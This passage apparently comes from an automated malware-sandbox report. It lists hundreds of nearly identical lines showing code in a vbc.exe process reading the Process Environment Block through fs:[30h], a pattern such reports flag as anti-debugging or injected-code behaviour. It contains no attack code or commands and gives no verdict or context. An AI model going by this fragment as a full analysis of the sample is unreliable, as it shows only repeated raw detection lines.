                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B05A7 mov eax, dword ptr fs:[00000030h]7_2_053B05A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B05A7 mov eax, dword ptr fs:[00000030h]7_2_053B05A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B05A7 mov eax, dword ptr fs:[00000030h]7_2_053B05A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E59C mov eax, dword ptr fs:[00000030h]7_2_0536E59C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05332582 mov eax, dword ptr fs:[00000030h]7_2_05332582
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05332582 mov ecx, dword ptr fs:[00000030h]7_2_05332582
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05364588 mov eax, dword ptr fs:[00000030h]7_2_05364588
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E5E7 mov eax, dword ptr fs:[00000030h]7_2_0535E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E5E7 mov eax, dword ptr fs:[00000030h]7_2_0535E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E5E7 mov eax, dword ptr fs:[00000030h]7_2_0535E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E5E7 mov eax, dword ptr fs:[00000030h]7_2_0535E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E5E7 mov eax, dword ptr fs:[00000030h]7_2_0535E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E5E7 mov eax, dword ptr fs:[00000030h]7_2_0535E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E5E7 mov eax, dword ptr fs:[00000030h]7_2_0535E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535E5E7 mov eax, dword ptr fs:[00000030h]7_2_0535E5E7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053325E0 mov eax, dword ptr fs:[00000030h]7_2_053325E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536C5ED mov eax, dword ptr fs:[00000030h]7_2_0536C5ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536C5ED mov eax, dword ptr fs:[00000030h]7_2_0536C5ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053365D0 mov eax, dword ptr fs:[00000030h]7_2_053365D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536A5D0 mov eax, dword ptr fs:[00000030h]7_2_0536A5D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536A5D0 mov eax, dword ptr fs:[00000030h]7_2_0536A5D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E5CF mov eax, dword ptr fs:[00000030h]7_2_0536E5CF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E5CF mov eax, dword ptr fs:[00000030h]7_2_0536E5CF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536A430 mov eax, dword ptr fs:[00000030h]7_2_0536A430
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532E420 mov eax, dword ptr fs:[00000030h]7_2_0532E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532E420 mov eax, dword ptr fs:[00000030h]7_2_0532E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532E420 mov eax, dword ptr fs:[00000030h]7_2_0532E420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532C427 mov eax, dword ptr fs:[00000030h]7_2_0532C427
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B6420 mov eax, dword ptr fs:[00000030h]7_2_053B6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B6420 mov eax, dword ptr fs:[00000030h]7_2_053B6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B6420 mov eax, dword ptr fs:[00000030h]7_2_053B6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B6420 mov eax, dword ptr fs:[00000030h]7_2_053B6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B6420 mov eax, dword ptr fs:[00000030h]7_2_053B6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B6420 mov eax, dword ptr fs:[00000030h]7_2_053B6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B6420 mov eax, dword ptr fs:[00000030h]7_2_053B6420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05368402 mov eax, dword ptr fs:[00000030h]7_2_05368402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05368402 mov eax, dword ptr fs:[00000030h]7_2_05368402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05368402 mov eax, dword ptr fs:[00000030h]7_2_05368402
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535A470 mov eax, dword ptr fs:[00000030h]7_2_0535A470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535A470 mov eax, dword ptr fs:[00000030h]7_2_0535A470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535A470 mov eax, dword ptr fs:[00000030h]7_2_0535A470
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053BC460 mov ecx, dword ptr fs:[00000030h]7_2_053BC460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053EA456 mov eax, dword ptr fs:[00000030h]7_2_053EA456
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532645D mov eax, dword ptr fs:[00000030h]7_2_0532645D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0535245A mov eax, dword ptr fs:[00000030h]7_2_0535245A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E443 mov eax, dword ptr fs:[00000030h]7_2_0536E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E443 mov eax, dword ptr fs:[00000030h]7_2_0536E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E443 mov eax, dword ptr fs:[00000030h]7_2_0536E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E443 mov eax, dword ptr fs:[00000030h]7_2_0536E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E443 mov eax, dword ptr fs:[00000030h]7_2_0536E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E443 mov eax, dword ptr fs:[00000030h]7_2_0536E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E443 mov eax, dword ptr fs:[00000030h]7_2_0536E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536E443 mov eax, dword ptr fs:[00000030h]7_2_0536E443
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053644B0 mov ecx, dword ptr fs:[00000030h]7_2_053644B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053BA4B0 mov eax, dword ptr fs:[00000030h]7_2_053BA4B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053364AB mov eax, dword ptr fs:[00000030h]7_2_053364AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053EA49A mov eax, dword ptr fs:[00000030h]7_2_053EA49A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053304E5 mov ecx, dword ptr fs:[00000030h]7_2_053304E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536273C mov eax, dword ptr fs:[00000030h]7_2_0536273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536273C mov ecx, dword ptr fs:[00000030h]7_2_0536273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536273C mov eax, dword ptr fs:[00000030h]7_2_0536273C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053AC730 mov eax, dword ptr fs:[00000030h]7_2_053AC730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536C720 mov eax, dword ptr fs:[00000030h]7_2_0536C720
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536C720 mov eax, dword ptr fs:[00000030h]7_2_0536C720
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05330710 mov eax, dword ptr fs:[00000030h]7_2_05330710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05360710 mov eax, dword ptr fs:[00000030h]7_2_05360710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536C700 mov eax, dword ptr fs:[00000030h]7_2_0536C700
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05338770 mov eax, dword ptr fs:[00000030h]7_2_05338770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05340770 mov eax, dword ptr fs:[00000030h]7_2_05340770
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05330750 mov eax, dword ptr fs:[00000030h]7_2_05330750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053BE75D mov eax, dword ptr fs:[00000030h]7_2_053BE75D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372750 mov eax, dword ptr fs:[00000030h]7_2_05372750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372750 mov eax, dword ptr fs:[00000030h]7_2_05372750
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B4755 mov eax, dword ptr fs:[00000030h]7_2_053B4755
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536674D mov esi, dword ptr fs:[00000030h]7_2_0536674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536674D mov eax, dword ptr fs:[00000030h]7_2_0536674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536674D mov eax, dword ptr fs:[00000030h]7_2_0536674D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053307AF mov eax, dword ptr fs:[00000030h]7_2_053307AF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053E47A0 mov eax, dword ptr fs:[00000030h]7_2_053E47A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D678E mov eax, dword ptr fs:[00000030h]7_2_053D678E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053347FB mov eax, dword ptr fs:[00000030h]7_2_053347FB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053347FB mov eax, dword ptr fs:[00000030h]7_2_053347FB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053527ED mov eax, dword ptr fs:[00000030h]7_2_053527ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053527ED mov eax, dword ptr fs:[00000030h]7_2_053527ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053527ED mov eax, dword ptr fs:[00000030h]7_2_053527ED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053BE7E1 mov eax, dword ptr fs:[00000030h]7_2_053BE7E1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533C7C0 mov eax, dword ptr fs:[00000030h]7_2_0533C7C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B07C3 mov eax, dword ptr fs:[00000030h]7_2_053B07C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534E627 mov eax, dword ptr fs:[00000030h]7_2_0534E627
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05366620 mov eax, dword ptr fs:[00000030h]7_2_05366620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05368620 mov eax, dword ptr fs:[00000030h]7_2_05368620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0533262C mov eax, dword ptr fs:[00000030h]7_2_0533262C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05372619 mov eax, dword ptr fs:[00000030h]7_2_05372619
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053AE609 mov eax, dword ptr fs:[00000030h]7_2_053AE609
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534260B mov eax, dword ptr fs:[00000030h]7_2_0534260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534260B mov eax, dword ptr fs:[00000030h]7_2_0534260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534260B mov eax, dword ptr fs:[00000030h]7_2_0534260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534260B mov eax, dword ptr fs:[00000030h]7_2_0534260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534260B mov eax, dword ptr fs:[00000030h]7_2_0534260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534260B mov eax, dword ptr fs:[00000030h]7_2_0534260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534260B mov eax, dword ptr fs:[00000030h]7_2_0534260B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05362674 mov eax, dword ptr fs:[00000030h]7_2_05362674
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F866E mov eax, dword ptr fs:[00000030h]7_2_053F866E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F866E mov eax, dword ptr fs:[00000030h]7_2_053F866E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536A660 mov eax, dword ptr fs:[00000030h]7_2_0536A660
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536A660 mov eax, dword ptr fs:[00000030h]7_2_0536A660
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534C640 mov eax, dword ptr fs:[00000030h]7_2_0534C640
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053666B0 mov eax, dword ptr fs:[00000030h]7_2_053666B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536C6A6 mov eax, dword ptr fs:[00000030h]7_2_0536C6A6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05334690 mov eax, dword ptr fs:[00000030h]7_2_05334690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05334690 mov eax, dword ptr fs:[00000030h]7_2_05334690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053AE6F2 mov eax, dword ptr fs:[00000030h]7_2_053AE6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053AE6F2 mov eax, dword ptr fs:[00000030h]7_2_053AE6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053AE6F2 mov eax, dword ptr fs:[00000030h]7_2_053AE6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053AE6F2 mov eax, dword ptr fs:[00000030h]7_2_053AE6F2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B06F1 mov eax, dword ptr fs:[00000030h]7_2_053B06F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B06F1 mov eax, dword ptr fs:[00000030h]7_2_053B06F1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536A6C7 mov ebx, dword ptr fs:[00000030h]7_2_0536A6C7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0536A6C7 mov eax, dword ptr fs:[00000030h]7_2_0536A6C7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05360124 mov eax, dword ptr fs:[00000030h]7_2_05360124
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404164 mov eax, dword ptr fs:[00000030h]7_2_05404164
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05404164 mov eax, dword ptr fs:[00000030h]7_2_05404164
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DA118 mov ecx, dword ptr fs:[00000030h]7_2_053DA118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DA118 mov eax, dword ptr fs:[00000030h]7_2_053DA118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DA118 mov eax, dword ptr fs:[00000030h]7_2_053DA118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DA118 mov eax, dword ptr fs:[00000030h]7_2_053DA118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F0115 mov eax, dword ptr fs:[00000030h]7_2_053F0115
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE10E mov eax, dword ptr fs:[00000030h]7_2_053DE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE10E mov ecx, dword ptr fs:[00000030h]7_2_053DE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE10E mov eax, dword ptr fs:[00000030h]7_2_053DE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE10E mov eax, dword ptr fs:[00000030h]7_2_053DE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE10E mov ecx, dword ptr fs:[00000030h]7_2_053DE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE10E mov eax, dword ptr fs:[00000030h]7_2_053DE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE10E mov eax, dword ptr fs:[00000030h]7_2_053DE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE10E mov ecx, dword ptr fs:[00000030h]7_2_053DE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE10E mov eax, dword ptr fs:[00000030h]7_2_053DE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053DE10E mov ecx, dword ptr fs:[00000030h]7_2_053DE10E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532C156 mov eax, dword ptr fs:[00000030h]7_2_0532C156
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C8158 mov eax, dword ptr fs:[00000030h]7_2_053C8158
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05336154 mov eax, dword ptr fs:[00000030h]7_2_05336154
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05336154 mov eax, dword ptr fs:[00000030h]7_2_05336154
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C4144 mov eax, dword ptr fs:[00000030h]7_2_053C4144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C4144 mov eax, dword ptr fs:[00000030h]7_2_053C4144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C4144 mov ecx, dword ptr fs:[00000030h]7_2_053C4144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C4144 mov eax, dword ptr fs:[00000030h]7_2_053C4144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C4144 mov eax, dword ptr fs:[00000030h]7_2_053C4144
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B019F mov eax, dword ptr fs:[00000030h]7_2_053B019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B019F mov eax, dword ptr fs:[00000030h]7_2_053B019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B019F mov eax, dword ptr fs:[00000030h]7_2_053B019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053B019F mov eax, dword ptr fs:[00000030h]7_2_053B019F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532A197 mov eax, dword ptr fs:[00000030h]7_2_0532A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532A197 mov eax, dword ptr fs:[00000030h]7_2_0532A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532A197 mov eax, dword ptr fs:[00000030h]7_2_0532A197
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_054061E5 mov eax, dword ptr fs:[00000030h]7_2_054061E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_05370185 mov eax, dword ptr fs:[00000030h]7_2_05370185
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053EC188 mov eax, dword ptr fs:[00000030h]7_2_053EC188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053EC188 mov eax, dword ptr fs:[00000030h]7_2_053EC188
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D4180 mov eax, dword ptr fs:[00000030h]7_2_053D4180
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053D4180 mov eax, dword ptr fs:[00000030h]7_2_053D4180
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053601F8 mov eax, dword ptr fs:[00000030h]7_2_053601F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053AE1D0 mov eax, dword ptr fs:[00000030h]7_2_053AE1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053AE1D0 mov eax, dword ptr fs:[00000030h]7_2_053AE1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053AE1D0 mov ecx, dword ptr fs:[00000030h]7_2_053AE1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053AE1D0 mov eax, dword ptr fs:[00000030h]7_2_053AE1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053AE1D0 mov eax, dword ptr fs:[00000030h]7_2_053AE1D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F61C3 mov eax, dword ptr fs:[00000030h]7_2_053F61C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053F61C3 mov eax, dword ptr fs:[00000030h]7_2_053F61C3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053C6030 mov eax, dword ptr fs:[00000030h]7_2_053C6030
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532A020 mov eax, dword ptr fs:[00000030h]7_2_0532A020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0532C020 mov eax, dword ptr fs:[00000030h]7_2_0532C020
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534E016 mov eax, dword ptr fs:[00000030h]7_2_0534E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534E016 mov eax, dword ptr fs:[00000030h]7_2_0534E016
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0534E016 mov eax, dword ptr fs:[00000030h]7_2_0534E016
